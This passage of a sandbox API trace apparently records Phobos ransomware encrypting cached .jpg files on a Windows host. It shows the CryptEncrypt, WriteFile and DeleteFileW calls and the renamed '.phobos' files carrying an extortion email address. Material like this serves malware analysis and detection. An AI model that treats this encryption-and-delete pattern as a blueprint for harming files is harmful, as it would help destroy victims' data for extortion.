lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2a77, lpOverlapped=0x0) returned 1 [0186.559] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2a80, dwBufLen=0x2a80 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2a80) returned 1 [0186.559] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2a80, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2a80, lpOverlapped=0x0) returned 1 [0186.560] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c68) returned 1 [0186.560] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0186.560] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0186.560] CryptDestroyKey (hKey=0xa32c68) returned 1 [0186.560] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0186.560] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0186.560] CloseHandle (hObject=0x160) returned 1 [0186.560] CloseHandle (hObject=0x130) returned 1 [0186.560] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE9tdx[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbe9tdx[1].jpg")) returned 1 [0186.561] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0186.561] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeEwt[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeeewt[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0186.562] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2135) returned 1 [0186.562] CloseHandle (hObject=0x130) returned 1 [0186.562] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeEwt[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeeewt[1].jpg")) returned 0x2020 [0186.562] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeEwt[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeeewt[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.562] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeEwt[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeeewt[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0186.563] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0186.563] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0186.563] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeEwt[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeeewt[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0186.563] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ca8) returned 1 [0186.563] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0186.563] ReadFile (in: hFile=0x130, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x857, lpOverlapped=0x0) returned 1 [0186.699] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x860, dwBufLen=0x860 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x860) returned 1 [0186.699] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x860, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x860, lpOverlapped=0x0) returned 1 [0186.700] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32aa8) returned 1 [0186.700] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0186.700] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0186.700] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0186.700] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0186.700] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0186.700] CloseHandle (hObject=0x130) returned 1 [0186.700] CloseHandle (hObject=0x160) returned 1 [0186.700] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeEwt[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeeewt[1].jpg")) returned 1 [0186.703] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0186.703] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeis3[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeeis3[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0186.704] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2009) returned 1 [0186.704] CloseHandle (hObject=0x160) returned 1 [0186.704] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeis3[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeeis3[1].jpg")) returned 0x2020 [0186.704] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeis3[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeeis3[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.704] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeis3[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeeis3[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0186.705] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0186.705] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0186.705] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeis3[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeeis3[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0186.706] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ca8) returned 1 [0186.706] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0186.706] ReadFile (in: hFile=0x160, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x7d9, lpOverlapped=0x0) returned 1 [0186.741] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x7e0, dwBufLen=0x7e0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x7e0) returned 1 [0186.741] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x7e0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x7e0, lpOverlapped=0x0) returned 1 [0186.742] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c68) returned 1 [0186.742] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0186.742] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0186.742] CryptDestroyKey (hKey=0xa32c68) returned 1 [0186.742] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0186.742] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0186.742] CloseHandle (hObject=0x160) returned 1 [0186.742] CloseHandle (hObject=0x130) returned 1 [0186.742] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEeis3[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeeis3[1].jpg")) returned 1 [0186.743] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0186.743] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEewZB[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeewzb[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0186.744] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=13091) returned 1 [0186.744] CloseHandle (hObject=0x130) returned 1 [0186.744] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEewZB[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeewzb[1].jpg")) returned 0x2020 [0186.744] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEewZB[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeewzb[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.744] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEewZB[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeewzb[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0186.744] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0186.744] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0186.745] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEewZB[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeewzb[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0186.745] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ca8) returned 1 [0186.745] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0186.745] ReadFile (in: hFile=0x130, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x3323, lpOverlapped=0x0) returned 1 [0186.801] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3330, dwBufLen=0x3330 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3330) returned 1 [0186.801] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x3330, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x3330, lpOverlapped=0x0) returned 1 [0186.900] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32a28) returned 1 [0186.900] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0186.900] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0186.900] CryptDestroyKey (hKey=0xa32a28) returned 1 [0186.900] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0186.900] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0186.900] CloseHandle (hObject=0x130) returned 1 [0186.900] CloseHandle (hObject=0x160) returned 1 [0186.901] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEewZB[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbeewzb[1].jpg")) returned 1 [0186.902] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0186.902] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEf6s4[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbef6s4[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0186.903] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=11570) returned 1 [0186.903] CloseHandle (hObject=0x160) returned 1 [0186.903] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEf6s4[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbef6s4[1].jpg")) returned 0x2020 [0186.903] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEf6s4[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbef6s4[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.903] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEf6s4[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbef6s4[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0186.904] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0186.904] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0186.904] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEf6s4[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbef6s4[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0186.904] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ca8) returned 1 [0186.904] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0186.905] ReadFile (in: hFile=0x160, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2d32, lpOverlapped=0x0) returned 1 [0186.929] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2d40, dwBufLen=0x2d40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2d40) returned 1 [0186.929] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2d40, lpOverlapped=0x0) returned 1 [0186.929] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0186.929] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0186.929] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0186.930] CryptDestroyKey (hKey=0xa327e8) returned 1 [0186.930] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0186.930] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0186.930] CloseHandle (hObject=0x160) returned 1 [0186.930] CloseHandle (hObject=0x130) returned 1 [0186.930] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEf6s4[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbef6s4[1].jpg")) returned 1 [0186.931] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0186.931] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfgDi[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefgdi[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0186.931] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=6524) returned 1 [0186.931] CloseHandle (hObject=0x130) returned 1 [0186.931] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEfgDi[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbefgdi[1].jpg")) returned 0x2020 [0186.931] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 